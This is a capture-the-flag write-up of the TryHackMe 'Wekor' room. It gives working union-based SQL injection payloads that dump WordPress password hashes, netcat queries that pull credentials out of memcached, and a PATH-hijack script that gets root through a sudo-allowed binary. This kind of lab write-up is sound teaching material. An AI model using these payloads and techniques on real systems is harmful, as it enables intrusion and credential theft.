TryHackMe | Wekor

This room was a very interesting one which involved a couple of techniques I hadn't used before.  It also required using some tools I've used a lot before but for different purposes.  That being said, I started in the usual way by scanning for open ports.

Port Scan

# Nmap 7.91 scan initiated Sat May 29 00:36:16 2021 as: nmap -F -oN wekor.nmap 10.10.30.12
Nmap scan report for 10.10.30.12
Host is up (0.039s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Usually when only port 80 and 22 are open it means that the way in to the server will be via a web-based attack through the web site.  I added wekor.thm to my /etc/hosts file and went to the URL.

This just displayed a simple white site with the text "Welcome internet user".  I decided to scan for hidden directories/files.

Directory Scan

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)

A quick look at the robots.txt file revealed quite a lot of interesting directories to try.

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting

All of these didn't lead anywhere, except /comingreallysoon.

Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot ! 

So I visited the /it-next directory and was greeted with the following website.

A computer services website

I searched around the website for some vulnerabilities and eventually came across a field that was susceptible to SQL Injection.  This was the coupon field on the Shopping Cart page.

SQL Injection

The ' character in the field caused this error

I started off by trying to determine how many values a legitimate query in this box is supposed to return.  This can be achieved by escaping the original query parameter and adding an order by clause with sequential numbers.  Whichever number it fails on, we know that the query is expecting 1 result less than this. I entered the coupon code ' order by 1,2,3,4,5,6,7,8,9 -- - and Unknown column '4' in 'order clause' was returned.  I now know we are expecting 3 values in response.

From here I can run queries like the following to determine any schemas (databases) that are present.

' union select 1,group_concat(schema_name),3  from information_schema.schemata -- -

This works by joining results from the left, which thanks to me escaping the intended coupon code value, will be null, and the result of the query on the right, which in this case is returning 3 values, 1, the names of the databases on the server (comma separated thanks to group_concat) and 3.

Coupon Code : 1 With ID : information_schema,coupons,mysql,performance_schema,sys,wordpress And With Expire Date Of : 3 Is Valid!

Interesting, so there appears to be a wordpress database on the server and most likely a WordPress website running somewhere as well.  I crafted a query to extract the usernames and password hashes for the users in the WordPress database and then used hashcat to crack the passwords offline.

' union select 1, group_concat(user_login, ':', user_pass),3 from wordpress.wp_users -- -

admin:$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
wp_jeffrey:$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
wp_yura:$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
wp_eagle:$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/

I now had a valid username and password for a WordPress site somewhere, but did not know where to find it, so it was time to scan for subdomains.

Subdomain Enumeration

Up until now I had only ever used gobuster to scan for directories, by using the gobuster dir command but I learned that it can also be used to search for vhost which can include sub-domains.  I ran gobuster and got the following results.

──(gareth㉿enso)-[~/Desktop/Files/Wekor]
└─$ gobuster vhost -u http://wekor.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://wekor.thm
[+] Threads:      10
[+] Wordlist:     /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2021/05/31 21:52:03 Starting gobuster
===============================================================
Found: site.wekor.thm (Status: 200) [Size: 143]

Site.Wekor.thm

I added this subdomain to my /etc/hosts file and visited the URL in my browser.

To my disappointment it did not reveal a wordpress site but instead simply said Hi there! Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS! - Jim

I decided to do a normal directory scan on the site.wekor.thm subdomain to see if anything interesting stood out there.

┌──(gareth㉿enso)-[~/Desktop/Files/Wekor]
└─$ gobuster dir -u http://site.wekor.thm -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://site.wekor.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/05/31 21:55:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2021/05/31 21:55:32 Finished
===============================================================

I finally found the location of the WordPress blog site.

WordPress Plugin

http://site.wekor.thm/wordpress

I was able to login as a user on the WordPress blog by using the previously cracked password I found through the SQL injection exploit.

The user I logged in with was the wp_yura user.  This user was allowed to add plugins, so I added a WordPress reverse shell plugin and was able to connect to my machine.

www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Horizontal Privilege Escalation

Now that I had a shell on the server I could start to try and escalate my privileges.  The tag-line for the room said something about recognizing internal services, so I decided to check what ports were open locally.

www-data@osboxes:/home$ netstat -tupl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 *:ssh                   *:*                     LISTEN      -               
tcp        0      0 localhost:ipp           *:*                     LISTEN      -               
tcp        0      0 localhost:3010          *:*                     LISTEN      -               
tcp        0      0 localhost:mysql         *:*                     LISTEN      -               
tcp        0      0 localhost:11211         *:*                     LISTEN      -               
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -               
tcp6       0      0 ip6-localhost:ipp       [::]:*                  LISTEN      -               
tcp6       0      0 [::]:http               [::]:*                  LISTEN      -               
udp        0      0 *:ipp                   *:*                                 -               
udp        0      0 *:41100                 *:*                                 -               
udp        0      0 *:mdns                  *:*                                 -               
udp        0      0 *:bootpc                *:*                                 -               
udp6       0      0 [::]:57959              [::]:*                              -               
udp6       0      0 [::]:mdns               [::]:*                              -
I'd not seen 11211 before but it stood out to me for some reason

Memcached

A quick google for default port 11211 revealed that it was most likely memcached that was running on the server.  According to the website memcached is a Free and open source, high-performance, distributed memory object caching system.

I did some googling around how to interrogate memcached and found that I could use my good friend netcat to send commands to it.

Thanks to hacktrickz I was able to figure out how to query this memory object caching system and find something useful.

www-data@osboxes:/home$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211 
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
ITEM id [4 b; 1622488289 s]
ITEM email [14 b; 1622488289 s]
ITEM salary [8 b; 1622488289 s]
ITEM password [15 b; 1622488289 s]
ITEM username [4 b; 1622488289 s]
END

I obviously want to see the username and password values.  So I check on hacktrickz for how to do this and then execute the following commands:

www-data@osboxes:/home$ echo "get username" | nc -vn -w 1 127.0.0.1 1121
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE username 0 4
Orka
END
www-data@osboxes:/home$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE password 0 15
<redacted>
END

User.txt

With the username and password I was able to switch to the Orka user and capture the user.txt flag.

www-data@osboxes:/home$ su Orka
Password:    
Orka@osboxes:/home$ cd Orka
Orka@osboxes:~$ cat user.txt 
<redacted>

Vertical Privilege Escalation

I started enumerating the server to try and find a way to escalate my privileges to the root user.  I did my usual checks of what my user is allowed to run as sudo, what, if any, cron jobs are running and if there are any binaries with the SUID bit set.

I found that the Orka user could run the bitcoin binary as the root user.

Orka@osboxes:~/Desktop$ sudo -l
[sudo] password for Orka: 
Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin

I ran strings on the bitcoin binary and found that it made a call to transfer.py.

...
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 
 Sorry, This is not a valid amount! 
python /home/Orka/Desktop/transfer.py %c
...
Result of the 'Strings' command on the bitcoin binary file

Unfortunately I didn't have write permissions on the transfer.py file, but I did notice something about the call to execute it.  The bitcoin binary was not using an absolute path for the python executable.  This should mean I can make my own python binary and have bitcoin execute it instead (provided it is found on the PATH before the actual python binary).

Orka@osboxes:~/Desktop$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
Orka@osboxes:~/Desktop$ which python
/usr/bin/python
/usr/sbin is searched before /usr/bin. Hmm...

/usr/sbin/python

Thankfully the /usr/sbin directory was writeable by the Orka user so I was able to make my own "python" file which opens a bash shell, giving me access as the root user.

Orka@osboxes:~/Desktop$ cd /usr/sbin
Orka@osboxes:/usr/sbin$ touch python
Orka@osboxes:/usr/sbin$ nano python
Orka@osboxes:/usr/sbin$ cat python
#!/bin/bash

/bin/bash
Orka@osboxes:/usr/sbin$ chmod +x python

Root Access

Orka@osboxes:~/Desktop$ sudo ./bitcoin 
Enter the password : password
Access Granted...
                        User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 9
root@osboxes:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:~/Desktop# cat /root/root.txt
<redacted>

Summary

I liked this room because it involved a few different techniques and felt quite realistic.  I learned how to interrogate memcached and how to use gobuster to search for different vhosts rather than just directories.

Gareth Oates

Gareth Oates

Oslo, Norway